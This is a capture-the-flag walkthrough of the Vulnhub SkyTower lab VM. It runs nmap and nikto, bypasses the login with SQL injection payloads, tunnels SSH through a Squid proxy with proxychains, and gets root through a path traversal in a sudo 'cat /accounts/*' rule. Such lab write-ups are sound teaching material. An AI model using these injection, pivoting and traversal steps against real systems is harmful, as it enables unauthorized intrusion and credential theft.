Vulnhub

Skytower

Let’s start with the usual, nmap.

nmap -sS -sC -A -p- -T 4 -
Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-25 21:59 EDT
Nmap scan report for SkyTower (192.168.1.137)
Host is up (0.0044s latency).
Not shown: 65532 closed ports
PORT     STATE    SERVICE    VERSION
22/tcp   filtered ssh
80/tcp   open     http       Apache httpd 2.2.22 ((Debian))
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Site doesn't have a title (text/html).
3128/tcp open     http-proxy Squid http proxy 3.1.20
|_http-server-header: squid/3.1.20
|_http-title: ERROR: The requested URL could not be retrieved
MAC Address: 08:00:27:54:4A:37 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.10, Linux 3.2 - 3.16
Network Distance: 1 hop

Let’s send nikto find stuff

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.137
+ Target Hostname:    192.168.1.137
+ Target Port:        80  
+ Start Time:         2017-05-25 22:00:42 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Debian)
+ Server leaks inodes via ETags, header found with file /, inode: 87, size: 1136, mtime: Fri Jun 20 07:23:36 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS 
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Retrieved x-powered-by header: PHP/5.4.4-14+deb7u9
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST 
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 8346 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2017-05-25 22:00:53 (GMT-4) (11 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Alright, let’s see what’s on the website

Website

We got a login page and the code source doesn’t have much. Let’s see if we have mysql running in the background. Let’s try to create an error.

' or 1 # -- 
There was an error running the query [You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right
syntax to use near '1 # ' and password=''' at line 1]

So we do have mysql. Let’s try some of the usual stuff in.

After maybe 30 minutes of trying different stuff, i found that this request allows us to login

email='*'&password='*'

Once we login we’re greet with this.

Welcome [email protected]

As you may know, SkyTech has ceased all international operations.

To all our long term employees, we wish to convey our thanks for your dedication and hard work.

Unfortunately, all international contracts, including yours have been terminated.

The remainder of your contract and retirement fund, $2 ,has been payed out in full to a secure account. For security reasons, you must login to the SkyTech server via SSH to access the account details.

Username: john
Password: hereisjohn 

We wish you the best of luck in your future endeavors. 

That’s cool a free ssh login!

SSH

So trying to connect via ssh isn’t working. Uh huh… So i would assume that we need the use their proxy to tunnel my connection to the ssh port.

We’ll configure proxychains to use the http proxy that squid is providing.

vi /etc/proxychains

http 192.168.1.137 3128

We got to make sure to comment the other proxies.

proxychains ssh [email protected]
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-192.168.1.137:3128-<><>-192.168.1.137:22-<><>-OK
[email protected]'s password: 
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri May 26 12:33:56 2017 from 192.168.1.137

Funds have been withdrawn
Connection to 192.168.1.137 closed.

Well shit, our connection gets closed automatically. We’ll tell ssh to execute a command when it connects

proxychains ssh [email protected] /bin/bash

ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-192.168.1.137:3128-<><>-192.168.1.137:22-<><>-OK
[email protected]'s password: 
id
uid=1000(john) gid=1000(john) groups=1000(john)

We’re in.

Enumeration

Like always, the kernel first

uname -a
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64 GNU/Linux

Alright there might be stuff that we could that with that.

Let’s look at the ports listening.

netstat -ntlp
(No info could be read for "-p": geteuid()=1000 but you should be root.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN
tcp6       0      0 :::80                   :::*                    LISTEN
tcp6       0      0 :::22                   :::*                    LISTEN
tcp6       0      0 :::3128                 :::*                    LISTEN

Oh yeah that’s right, it had a vulnerable mysql database. That means that the web service most probably has a configuration file that could contain the login for the mysql service.

cd /var/www
cat login.php

...
$db = new mysqli('localhost', 'root', 'root', 'SkyTech');
...
$sql= "SELECT * FROM login where email='".$email."' and password='".$password."';";

So root/root huh and it looks like the table is called login. So we got a database name (SkyTower) and where to look for those logins.

mysql -u root -p 
Enter password: root
use SkyTech;
select * from login;
:
;
id      email   password
1       [email protected]        hereisjohn
2       [email protected]        ihatethisjob
3       [email protected]     senseable

So there. More logins huh. Let’s look at their sudo rights. After look at them, John doesn’t seem to have any, William password doesn’t even work ?

So the only one that something good for us is Sara, and they are good stuff. Running as root, the dream!

sudo -l 
Matching Defaults entries for sara on this host:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sara may run the following commands on this host:
    (root) NOPASSWD: /bin/cat /accounts/*, (root) /bin/ls /accounts/*

By the looks of it, we’ll be able to traverse the system with our two commands.

sudo /bin/ls /accounts/../root/
flag.txt

 sudo /bin/cat /accounts/../root/flag.txt
 Congratz, have a cold one to celebrate!
 root password is theskytower
 
proxychains ssh [email protected] /bin/sh -i
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-192.168.1.137:3128-<><>-192.168.1.137:22-<><>-OK
[email protected]'s password: 
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)

So that’s that. GG.